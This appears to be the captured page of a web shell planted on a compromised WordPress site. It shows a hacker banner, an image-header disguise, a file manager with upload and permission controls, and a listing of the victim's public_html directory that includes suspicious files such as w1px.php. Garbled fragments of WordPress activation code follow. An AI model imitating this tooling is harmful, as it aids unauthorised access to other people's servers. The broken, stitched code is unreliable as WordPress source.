ÿØÿÛ C   iamH4CKEERRRRRRRRRRRS

I am a hacker in the dark of a very cold night

path :/home/dissertationspec/public_html

upload file:

List of files:

name file size edit permission action
.htaccess496 KBAugust 12 2025 07:24:490444
.tmb-July 24 2025 07:08:080777
.well-known-February 21 2025 22:43:530755
about.php7585 KBAugust 12 2025 07:17:170644
cgi-bin-July 25 2025 08:38:480755
error_log1344306 KBAugust 13 2025 16:32:330644
google72e26b69698a946b.html53 KBJuly 18 2025 03:22:260644
index.php63022 KBAugust 12 2025 10:12:170444
license.txt19903 KBApril 16 2025 12:14:260644
readme.html7425 KBJuly 16 2025 01:19:410644
shwab.html372 KBJuly 21 2025 03:21:310644
w1px.php26454 KBJuly 21 2025 00:45:540644
wp-activate.php7387 KBFebruary 13 2024 19:19:100644
wp-admin-July 25 2025 00:57:280755
wp-blog-header.php351 KBFebruary 06 2020 11:33:120644
wp-comments-post.php2323 KBJune 14 2023 18:11:160644
wp-config-sample.php29604 KBApril 16 2025 12:14:270644
wp-config.php3670 KBFebruary 21 2025 22:04:510644
wp-content-August 13 2025 16:32:330755
wp-cron.php5617 KBAugust 02 2024 23:40:160644
wp-includes-July 24 2025 23:27:250755
wp-links-opml.php2502 KBNovember 27 2022 02:01:180644
wp-load.php3970 KBMarch 11 2024 14:05:260644
wp-login.php51414 KBApril 16 2025 12:14:260644
wp-mail.php8727 KBApril 16 2025 12:14:260644
wp-settings.php30081 KBApril 16 2025 12:14:270644
wp-signup.php34516 KBApril 16 2025 12:14:270644
wp-trackback.php5102 KBOctober 18 2024 19:56:180644
xmlrpc.php3205 KBApril 16 2025 12:14:270644
get_error_code() ) ) { status_header( 404 ); } elseif ( is_wp_error( $result ) ) { $error_code = $result->get_error_code(); if ( ! in_array( $error_code, $valid_error_codes, true ) ) { status_header( 400 ); } } nocache_headers(); if ( is_object( $wp_object_cache ) ) { $wp_object_cache->cache_enabled = false; } // Fix for page title. $wp_query->is_404 = false; /** * Fires before the Site Activation page is loaded. * * @since 3.0.0 */ do_action( 'activate_header' ); /** * Adds an action hook specific to this page. * * Fires on {@see 'wp_head'}. * * @since MU (3.0.0) */ function do_activate_header() { /** * Fires within the `` section of the Site Activation page. * * Fires on the {@see 'wp_head'} action. * * @since 3.0.0 */ do_action( 'activate_wp_head' ); } add_action( 'wp_head', 'do_activate_header' ); /** * Loads styles specific to this page. * * @since MU (3.0.0) */ function wpmu_activate_stylesheet() { ?>


get_error_code(), $valid_error_codes, true ) ) { $signup = $result->get_error_data(); ?>

'; if ( '' === $signup->domain . $signup->path ) { printf( /* translators: 1: Login URL, 2: Username, 3: User email address, 4: Lost password URL. */ __( 'Your account has been activated. You may now log in to the site using your chosen username of “%2$s”. Please check your email inbox at %3$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can reset your password.' ), esc_url( network_site_url( $blog_details->path . 'wp-login.php', 'login' ) ), esc_html( $signup->user_login ), esc_html( $signup->user_email ), esc_url( wp_lostpassword_url() ) ); } else { printf( /* translators: 1: Site URL, 2: Username, 3: User email address, 4: Lost password URL. */ __( 'Your site at %1$s is active. You may now log in to your site using your chosen username of “%2$s”. Please check your email inbox at %3$s for your password and login instructions. If you do not receive an email, please check your junk or spam folder. If you still do not receive an email within an hour, you can reset your password.' ), sprintf( '%1$s', esc_url( $signup->domain . $blog_details->path ) ), esc_html( $signup->user_login ), esc_html( $signup->user_email ), esc_url( wp_lostpassword_url() ) ); } echo '

'; } elseif ( null === $result || is_wp_error( $result ) ) { ?>

get_error_message() ); ?>

user_login ); ?>

View your site or Log in' ), esc_url( $url ), esc_url( $login_url ) ); ?>

Log in or go back to the homepage.' ), esc_url( network_site_url( $blog_details->path . 'wp-login.php', 'login' ) ), esc_url( network_home_url( $blog_details->path ) ) ); ?>